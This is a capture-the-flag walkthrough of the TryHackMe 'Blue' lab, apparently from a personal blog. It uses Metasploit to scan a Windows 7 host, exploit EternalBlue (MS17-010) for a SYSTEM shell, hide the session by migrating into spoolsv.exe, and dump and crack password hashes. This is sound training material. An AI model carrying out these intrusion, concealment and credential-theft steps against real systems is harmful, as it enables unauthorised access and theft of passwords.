TryHackMe - Blue

The room link can be found at TryHackMe - Blue

For this room, I will be using the Metasploit framework.

Recon

We begin with a Nmap of the box to see the services and get their version.

msf5 > db_nmap -sC -sV 10.10.47.219

Now we can see all the running services with the services command.

msf5 > services
Services
========

host           port   proto  name               state  info
----           ----   -----  ----               -----  ----
10.10.47.219   135    tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.10.47.219   445    tcp    microsoft-ds       open   Windows 7 Professional 7601 Service Pack 1 microsoft-ds workgroup: WORKGROUP
10.10.47.219   3389   tcp    ssl/ms-wbt-server  open
10.10.47.219   49152  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49153  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49154  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49158  tcp    msrpc              open   Microsoft Windows RPC
10.10.47.219   49160  tcp    msrpc              open   Microsoft Windows RPC

On this machine, we will focus on the SMB service which is on port 445.

We can gather more information using the module auxiliary/scanner/smb/smb_version. Running it the services page will lock more like this.

10.10.47.219  445    tcp    smb                open   Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)

Also we run auxiliary/scanner/smb/smb1 to check if the box has support for SMBv1.

msf5 auxiliary(scanner/smb/smb1) > run

[+] 10.10.47.219:445      - 10.10.47.219 supports SMBv1 dialect.
[*] 10.10.47.219:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As the machine name implies the box could be exploitable via EternalBlue. Since the machine has Windows 7 installed and SMBv1 enabled, it is most likely vulnerable. You can read more here Microsoft - EternalBlue.

We can check if the machine is vulnerable by running the module auxiliary/scanner/smb/smb_ms17_010.

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.47.219:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.47.219:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
<!--more-->

Gain Access

Now we search for an exploit we can use in Metasploit.

msf5 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Select it using use 2, set LHOST and RHOST, and run it. The exploit could fail multiple times. But if you continue trying it will succeed. You could also try setting the payload to generic/shell_reverce_tcp.

Now we have a meterpreter session on the box.

Escalate

If you have a simple shell you can use the post/multi/manage/shell_to_meterpreter module to upgrade your shell.

If you have a meterpreter shell you can check who you are with:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Since we are NT AUTHORITY\SYSTEM we have full administrator access to the box. With this privilege, we can migrate our process to spoolsv.exe to hide our process. We can use ps and migrate command for this. Alternatively, we can use run post/windows/manage/migrate to spawn a notepad process and migrate to it.

Cracking

To crack the passwords first we need to dump them. There are two ways to do this, we can use the hashdump command and crack them outside of Metasploit. Else we can run the post module use post/windows/gather/hashdump this will save the hashes in the database. Then we run use auxiliary/analyze/crack_windows to crack them with john. The challenge suggests us to use the wordlist rockyou.txt.

Find flags

To find the flag you can use the search command with the file name from the root directory.

meterpreter > search -f flag*